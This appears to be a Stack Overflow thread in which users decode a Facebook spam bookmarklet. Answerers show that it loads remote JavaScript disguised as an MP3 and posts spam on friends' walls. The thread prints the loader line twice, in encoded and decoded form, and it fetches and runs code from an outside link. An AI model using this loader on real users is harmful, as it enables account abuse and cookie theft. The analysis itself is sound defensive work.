2

So, I've just seen this spam code on Facebook, written in JavaScript and I wondered if someone could explain to me how the code works, and interacts with Facebook. I do not intend to use this for malicious purposes, but I am simply interested in the security of websites like Facebook. Here is the code that is executed from the address bar (I suggest not trying it yourself, you may end up with a few annoyed friends).

javascript:    (a%3D(b%3Ddocument).createElement('script')).src%3D'http%3A%2F%2Fbit.ly%2FFB1337%20%20%3F'%2BM  ath.random()%2Cb.body.appendChild(a)%3Bvoid(0)
James
  • 58
  • 1
  • 5

1 Answers1

3

Check it here, the link is url encoded.:

http://meyerweb.com/eric/tools/dencoder/

javascript:

a=(b=document).createElement('script')).src='http://bit.ly/FB1337?'+Math.random(),b.body.appendChild(a);void(0)

From what I see: load this url as a script and add it to the current page.

Edit: The script loaded is placed at this url: http://www.raxarstudios.com/x/audiotrack2.mp3

It's masqueraded as a mp3 song, but it's just javascript: http://pastebin.com/RVmNVtt9 I've quickly glanced at it, it apparently uses some heavy ajax to add events and to join yourselve to it.

Arend
  • 3,741
  • 2
  • 27
  • 37
  • 1
    Interestingly, if you add a `+` to the bitly link you'll get a page of stats showing how many people loaded the link (4,000), the bit.ly username of the originator (`draze`) and where the link goes (an mp3 audio track) – Adam Hopkinson Jun 05 '11 at 21:02
  • Ah, very useful tips from both of you, thanks! I'm assuming that the script is encoded as an MP3 file, would this assumption be correct? I also noticed that 92% of the traffic is from Facebook, which would match up with this being a spam script. – James Jun 05 '11 at 21:06
  • That link contains an "mp3" which you can open in a text editor to see the code. Doesn't look like it does anything fancy, just makes some POST requests to facebook (which should only work if you're on facebook when you enter that link). Has nothing to do with the security of Facebook, as there's not a whole lot they can do about you going out of your way to manually run malicious javascript... – BlueRaja - Danny Pflughoeft Jun 05 '11 at 21:07
  • The script itself is just in plain javascript. But most of the browsers receive it with an mp3 mime header and won't recognize it as javascript. If you download it, you see that it's just a plain text script. – Arend Jun 05 '11 at 21:08
  • The SWF files (posted onto the victim's wall) are located on a Photobucket account belonging to 'Drazaxa', these provide the fake video and also copy the initial script to your clipboard, which in turn links to that script disguised as an MP3 file. The MP3 file proceeds to post the 'video' on friend's walls. Thanks for the help on this one. – James Jun 05 '11 at 21:19
  • Yes but pasting this code to the URL textBox can be dangerous if the target script which is going to be executed was coded to send to the owner some visitor's cookies. – Darxis Jul 06 '11 at 08:53